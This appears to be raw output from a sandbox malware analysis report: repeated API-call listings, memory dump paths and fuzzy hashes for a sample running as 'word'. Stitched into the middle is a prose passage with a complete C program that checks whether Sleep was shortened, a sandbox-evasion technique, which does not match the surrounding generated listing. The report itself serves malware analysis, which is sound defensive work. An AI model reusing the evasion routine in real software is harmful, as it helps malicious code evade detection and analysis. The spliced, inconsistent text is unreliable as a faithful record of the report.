                                                                            • GetForegroundWindow.USER32 ref: 00459E07
                                                                            • GetDC.USER32(00000000), ref: 00459E44
                                                                            • GetPixel.GDI32(00000000,?,00000000), ref: 00459E4F
                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00459E8B
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Window$ForegroundPixelRelease
                                                                            • String ID:
                                                                            • API String ID: 4156661090-0
                                                                            • Opcode ID: c25ec76bf159445cc401153d518622b926736981535c7bd42fe0b2b106eefd61
                                                                            • Instruction ID: f25aa70a507d7fb142791e963b89e5313ab4350e7ab13503248c443e15a863bf
                                                                            • Opcode Fuzzy Hash: c25ec76bf159445cc401153d518622b926736981535c7bd42fe0b2b106eefd61
                                                                            • Instruction Fuzzy Hash: 76219D76600202ABD700EFA5CD49A5AB7E9FF84315F19483DF90597642DB78FC04CBA9
                                                                            APIs
                                                                              • Part of subcall function 004647A2: inet_addr.WSOCK32(?), ref: 004647C7
                                                                            • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 00464985
                                                                            • WSAGetLastError.WSOCK32(00000000,00000002,00000001,00000006,00000000), ref: 00464993
                                                                            • connect.WSOCK32(00000000,00000000,00000010,00000002,00000001,00000006,00000000), ref: 004649CD
                                                                            • WSAGetLastError.WSOCK32(00000000,00000000,00000000,00000010,00000002,00000001,00000006,00000000), ref: 004649F4
                                                                            • closesocket.WSOCK32(00000000,00000000,00000000,00000000,00000000,00000010,00000002,00000001,00000006,00000000), ref: 00464A07
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$closesocketconnectinet_addrsocket
                                                                            • String ID:
                                                                            • API String ID: 245547762-0
                                                                            • Opcode ID: aaa03f654d2c2080970664bbc2635e6406c59b0d093f7dcd590a1c65d79e0220
                                                                            • Instruction ID: b27d5ee258410aac5bd3077dd9c53ce90635b59006b610d0ec7ee295a05cd03d
                                                                            • Opcode Fuzzy Hash: aaa03f654d2c2080970664bbc2635e6406c59b0d093f7dcd590a1c65d79e0220
                                                                            • Instruction Fuzzy Hash: 3211DA712002109BD310FB2AC842F9BB3D8AF85728F04895FF594A72D2D7B9A885875A
                                                                            APIs
                                                                            • DeleteObject.GDI32(00000000), ref: 00447151
                                                                            • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000), ref: 00447195
                                                                            • SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                            • BeginPath.GDI32(?), ref: 004471B7
                                                                            • SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Object$Select$BeginCreateDeletePath
                                                                            • String ID:
                                                                            • API String ID: 2338827641-0
                                                                            • Opcode ID: f19e52de08adcd67550c2e9faff4417be3cdd69e9125f029607893bae639c511
                                                                            • Instruction ID: ab30216038401830d00444c504d41f25dcbf82a6e2307e0a418987ed8484b610
                                                                            • Opcode Fuzzy Hash: f19e52de08adcd67550c2e9faff4417be3cdd69e9125f029607893bae639c511
                                                                            • Instruction Fuzzy Hash: 7E2171B18083019FD320CF29AD44A1B7FACF74A724F14052FF654933A1EB789849CB69
                                                                            APIs
                                                                            • Sleep.KERNEL32(00000000,00000000,?,?,?,?,004448B6,0000000F,?), ref: 0043771E
                                                                            • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,004448B6,0000000F,?), ref: 0043773C
                                                                            • Sleep.KERNEL32(00000000,?,?,?,?,004448B6,0000000F,?), ref: 0043775C
                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,004448B6,0000000F,?), ref: 00437767
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: CounterPerformanceQuerySleep
                                                                            • String ID:
                                                                            • API String ID: 2875609808-0
                                                                            • Opcode ID: 901ea73111326f2a8af3d8a1217edfde6b6dff748f8bb26d3b0ac17b2ce0a9c5
                                                                            • Instruction ID: fd8a8a83491f03de43ea78fbc63302b75a2fa5438857304713168bbc83ca9150
                                                                            • Opcode Fuzzy Hash: 901ea73111326f2a8af3d8a1217edfde6b6dff748f8bb26d3b0ac17b2ce0a9c5
                                                                            • Instruction Fuzzy Hash: EA11A3B64093119BC210EF1ADA88A8FB7F4FFD8765F004D2EF9C462250DB34D5598B9A
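                                                                            The function above pairs each Sleep with a QueryPerformanceCounter read, which is the classic way to notice a sandbox that patches Sleep to return immediately: measure wall time around the sleep and compare it with what was requested. The listing does not show the sleep length or the threshold the sample uses, so the values below are assumptions. This is an added illustration of that technique, not code recovered from the analysed binary; the decision logic is kept in a platform-independent function, with the Windows calls under _WIN32 and a POSIX fallback so it also builds elsewhere.

```c
/*
 * Added example (not the sample's code): sleep-acceleration check built
 * from the same call sequence the listed function makes
 * (Sleep, QueryPerformanceCounter, Sleep, QueryPerformanceCounter).
 * Sleep length and tolerance are assumed values; the sample's are unknown.
 */
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>

#ifdef _WIN32
#include <windows.h>
#else
#include <time.h>
#endif

/* Monotonic wall-clock time in milliseconds. */
static double now_ms(void)
{
#ifdef _WIN32
    LARGE_INTEGER freq, cnt;
    QueryPerformanceFrequency(&freq);
    QueryPerformanceCounter(&cnt);
    return (double)cnt.QuadPart * 1000.0 / (double)freq.QuadPart;
#else
    struct timespec ts;
    clock_gettime(CLOCK_MONOTONIC, &ts);
    return (double)ts.tv_sec * 1000.0 + (double)ts.tv_nsec / 1e6;
#endif
}

/* Blocking sleep; Sleep() on Windows, nanosleep() elsewhere. */
static void sleep_ms(unsigned ms)
{
#ifdef _WIN32
    Sleep(ms);
#else
    struct timespec ts = { (time_t)(ms / 1000u), (long)(ms % 1000u) * 1000000L };
    nanosleep(&ts, NULL);
#endif
}

/*
 * Pure decision: a sandbox that hooks Sleep to return at once makes the
 * measured wall time fall well short of what was requested, while a
 * high-resolution counter that it did not fast-forward still tells the
 * truth. tolerance_ms absorbs scheduler jitter so an ordinary late
 * wake-up is not flagged. Returns 1 if the sleep looks shortened.
 */
int sleep_was_shortened(double requested_ms, double measured_ms, double tolerance_ms)
{
    return measured_ms + tolerance_ms < requested_ms;
}

/* Time one sleep of the requested length; returns elapsed milliseconds. */
double measure_sleep_ms(unsigned requested_ms)
{
    double t0 = now_ms();
    sleep_ms(requested_ms);
    double t1 = now_ms();
    return t1 - t0;
}

/* 1 = timing looks tampered with (sandbox/debugger), 0 = honest sleep. */
int timing_check(unsigned requested_ms)
{
    double elapsed = measure_sleep_ms(requested_ms);
    return sleep_was_shortened((double)requested_ms, elapsed, 2.0);
}

int main(void)
{
    unsigned req = 500; /* assumed length; the sample's value is not visible */
    double elapsed = measure_sleep_ms(req);
    printf("requested %u ms, measured %.1f ms -> %s\n", req, elapsed,
           sleep_was_shortened((double)req, elapsed, 2.0)
               ? "shortened (sleep patched?)" : "ok");
    return 0;
}
```

                                                                            A sandbox that only hooks Sleep and not the performance counter is caught by this; one that also virtualises the counter is not, which is why detonation environments usually skew all clock sources together rather than just accelerating Sleep.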
                                                                            APIs
                                                                            • SendMessageW.USER32 ref: 0046FD00
                                                                            • SendMessageW.USER32(?,0000104C,00000000,?), ref: 0046FD2E
                                                                            • SendMessageW.USER32(?,00001015,?,?), ref: 0046FD4B
                                                                            • DestroyIcon.USER32(?), ref: 0046FD58
                                                                            • DestroyIcon.USER32(?), ref: 0046FD5F
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$DestroyIcon
                                                                            • String ID:
                                                                            • API String ID: 3419509030-0
                                                                            • Opcode ID: a24bc400bf7eaff3d1708451a80103ed5292b50ec6011cebb58ec712c1110a53
                                                                            • Instruction ID: ba7c1cc62690e465ab1dcb48fa3e0f79152c3dc78d34179caeeeb49ed344ab69
                                                                            • Opcode Fuzzy Hash: a24bc400bf7eaff3d1708451a80103ed5292b50ec6011cebb58ec712c1110a53
                                                                            • Instruction Fuzzy Hash: 5F1182B15043449BE730DF14DC46BABB7E8FBC5714F00492EE6C857291D6B8A84A8B67
                                                                            APIs
                                                                            • __getptd.LIBCMT ref: 004175AE
                                                                              • Part of subcall function 00416C72: __getptd_noexit.LIBCMT ref: 00416C75
                                                                              • Part of subcall function 00416C72: __amsg_exit.LIBCMT ref: 00416C82
                                                                            • __amsg_exit.LIBCMT ref: 004175CE
                                                                            • __lock.LIBCMT ref: 004175DE
                                                                            • InterlockedDecrement.KERNEL32(?,0048C9D8,0000000C,00411498,00000000,?,004114D4,?,00000000), ref: 004175FB
                                                                            • InterlockedIncrement.KERNEL32(001B2C50,0048C9D8,0000000C,00411498,00000000,?,004114D4,?,00000000), ref: 00417626
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                            • String ID:
                                                                            • API String ID: 4271482742-0
                                                                            • Opcode ID: 9041076209036267701916e3e7e7a5ecd924b858c75713c79b1599e88ef874d9
                                                                            • Instruction ID: de548182bd5f57d4f8c9f8a4c79293bfa6802d75d0085d2526eaa3c6a777046b
                                                                            • Opcode Fuzzy Hash: 9041076209036267701916e3e7e7a5ecd924b858c75713c79b1599e88ef874d9
                                                                            • Instruction Fuzzy Hash: 9401AD31944A11AFC710ABA998497CE7BB0BB11724F0540ABE80063791CB3CA9C1CFEE
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Destroy$DeleteObjectWindow$Icon
                                                                            • String ID:
                                                                            • API String ID: 4023252218-0
                                                                            • Opcode ID: 187bd120907745c88baacffad0920a9106e1cca1ea6db424662e0a83cd01c53e
                                                                            • Instruction ID: d1816f9fa450f538fb043821254e2bd2cfb9ade9207d957631f6d0e9d50691b6
                                                                            • Opcode Fuzzy Hash: 187bd120907745c88baacffad0920a9106e1cca1ea6db424662e0a83cd01c53e
                                                                            • Instruction Fuzzy Hash: 05015E70300605ABCB20DF65D9D4B2B77A8BF14712B50452AFD04D7346EB38EC48CB69
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00460342
                                                                            • GetWindowTextW.USER32(00000000,00000100,00000100), ref: 00460357
                                                                            • MessageBeep.USER32(00000000), ref: 0046036D
                                                                            • KillTimer.USER32 ref: 00460392
                                                                            • EndDialog.USER32 ref: 004603AB
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                            • String ID:
                                                                            • API String ID: 3741023627-0
                                                                            • Opcode ID: 5e0545b8da8baa7cb8324f4116d33f6edaa60507eab9176a587cebaf75a8c25b
                                                                            • Instruction ID: 48c257e0c270193328064fa19c5b46d6a870d8092b70dfec968bdaebd9a60f08
                                                                            • Opcode Fuzzy Hash: 5e0545b8da8baa7cb8324f4116d33f6edaa60507eab9176a587cebaf75a8c25b
                                                                            • Instruction Fuzzy Hash: BE018831500300A7E7209B54DE5DBDB77A8BF44B05F00492EB681A25D0E7F8A584CB55
                                                                            APIs
                                                                            • SendMessageW.USER32(?,00001101,00000000,?), ref: 00455514
                                                                            • DeleteObject.GDI32(?), ref: 0045564E
                                                                            • DeleteObject.GDI32(?), ref: 0045565C
                                                                            • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                            • DestroyWindow.USER32 ref: 00455678
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: DeleteDestroyObject$IconMessageSendWindow
                                                                            • String ID:
                                                                            • API String ID: 1489400265-0
                                                                            • Opcode ID: fb8346e1cf28bbdc4ad062342734fe1bacbf25b41774fd01ae6266dc65fad9d1
                                                                            • Instruction ID: 68d82c845863845e83b9d92669df32d5d1b96a6c2c0272d07869f65424c05900
                                                                            • Opcode Fuzzy Hash: fb8346e1cf28bbdc4ad062342734fe1bacbf25b41774fd01ae6266dc65fad9d1
                                                                            • Instruction Fuzzy Hash: D9014F703006419BDB10EF65DED8A2A73A9FB44712B40455AFE05DB286DB78EC49CB68
                                                                            APIs
                                                                              • Part of subcall function 0043343D: InvalidateRect.USER32(?,00000000,00000001), ref: 004334BE
                                                                            • DestroyWindow.USER32 ref: 00455640
                                                                            • DeleteObject.GDI32(?), ref: 0045564E
                                                                            • DeleteObject.GDI32(?), ref: 0045565C
                                                                            • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                            • DestroyWindow.USER32 ref: 00455678
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                                                                            • String ID:
                                                                            • API String ID: 1042038666-0
                                                                            • Opcode ID: 920ee65d6839c6288c76afce6441748d32e1b72318fe83d584ccefe2da360159
                                                                            • Instruction ID: 707d1f3050e1f0ff98422ce5efa9f9a4d3559fdafbc0a23101ed238e91bf2869
                                                                            • Opcode Fuzzy Hash: 920ee65d6839c6288c76afce6441748d32e1b72318fe83d584ccefe2da360159
                                                                            • Instruction Fuzzy Hash: B2014B702006419BCB10AF65D9C8A2A33ACAF19322780456AFD05D7242DB28EC498B79
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                            • String ID:
                                                                            • API String ID: 2625713937-0
                                                                            • Opcode ID: a89ec47609df172868659220a46891f09f78d761c189f4b7bb4a315096e7830c
                                                                            • Instruction ID: 1b0d13c7bbaa275692c81ef4a4760df4fcf6218f807946f7e03cce85d1463269
                                                                            • Opcode Fuzzy Hash: a89ec47609df172868659220a46891f09f78d761c189f4b7bb4a315096e7830c
                                                                            • Instruction Fuzzy Hash: F7F0A4751052019BD7508F18EC0C70E7FA8FB4F325F04462EEA19932E0DB781546CBAD
                                                                            APIs
                                                                              • Part of subcall function 00411A35: _doexit.LIBCMT ref: 00411A41
                                                                            • ___set_flsgetvalue.LIBCMT ref: 004140E1
                                                                              • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
                                                                              • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
                                                                              • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
                                                                            • ___fls_getvalue@4.LIBCMT ref: 004140EC
                                                                              • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
                                                                            • ___fls_setvalue@8.LIBCMT ref: 004140FF
                                                                              • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
                                                                            • GetLastError.KERNEL32(00000000,?,00000000), ref: 00414108
                                                                            • ExitThread.KERNEL32 ref: 0041410F
                                                                            • GetCurrentThreadId.KERNEL32(00000000,?,00000000), ref: 00414115
                                                                            • __freefls@4.LIBCMT ref: 00414135
                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 00414148
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Value$CurrentThread__decode_pointer$ErrorExitImageLastNonwritable___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                            • String ID:
                                                                            • API String ID: 132634196-0
                                                                            • Opcode ID: dbe0df41a3d89f03eebcd77cedb8c7fbd95cde8327ee68e759feca9a6a87dff2
                                                                            • Instruction ID: c6f54ac6c47f72d6c6be617d0ab0d95393642b3a08ca47198428750b18cc63fb
                                                                            • Opcode Fuzzy Hash: dbe0df41a3d89f03eebcd77cedb8c7fbd95cde8327ee68e759feca9a6a87dff2
                                                                            • Instruction Fuzzy Hash: EFE0B6318012096B8F0177F28E2A8DF3A2DAD56799B12842EBF10A3112DA6DD9D147AD
                                                                            APIs
                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 00415610
                                                                              • Part of subcall function 00418540: __FindPESection.LIBCMT ref: 0041859B
                                                                            • __getptd_noexit.LIBCMT ref: 00415620
                                                                            • CloseHandle.KERNEL32(?), ref: 00415634
                                                                            • __freeptd.LIBCMT ref: 0041563B
                                                                            • ExitThread.KERNEL32 ref: 00415643
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: CloseCurrentExitFindHandleImageNonwritableSectionThread__freeptd__getptd_noexit
                                                                            • String ID:
                                                                            • API String ID: 3798957060-0
APIs
  • Part of subcall function 00411A35: _doexit.LIBCMT ref: 00411A41
• ___set_flsgetvalue.LIBCMT ref: 00415690
  • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
  • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
  • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
• ___fls_getvalue@4.LIBCMT ref: 0041569B
  • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
• ___fls_setvalue@8.LIBCMT ref: 004156AD
  • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
• GetLastError.KERNEL32(00000000,?,00000000), ref: 004156B6
• ExitThread.KERNEL32 ref: 004156BD
• __freefls@4.LIBCMT ref: 004156D9
• __IsNonwritableInCurrentImage.LIBCMT ref: 004156EC
Memory Dump Source
• Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_word.jbxd
Similarity
• API ID: Value$__decode_pointer$CurrentErrorExitImageLastNonwritableThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
• String ID:
• API String ID: 1537469427-0
Strings
Memory Dump Source
• Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_word.jbxd
Similarity
• API ID: _malloc
• String ID: Default$|k
• API String ID: 1579825452-2254895183
APIs
  • Part of subcall function 00442C52: _wcslen.LIBCMT ref: 00442C82
• CoInitialize.OLE32(00000000), ref: 0046CE18
• CoCreateInstance.OLE32(00482A50,00000000,00000001,004828B0,?), ref: 0046CE31
• CoUninitialize.OLE32 ref: 0046CE50
Strings
Memory Dump Source
• Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_word.jbxd
Similarity
• API ID: CreateInitializeInstanceUninitialize_wcslen
• String ID: .lnk
• API String ID: 886957087-24824748
Strings
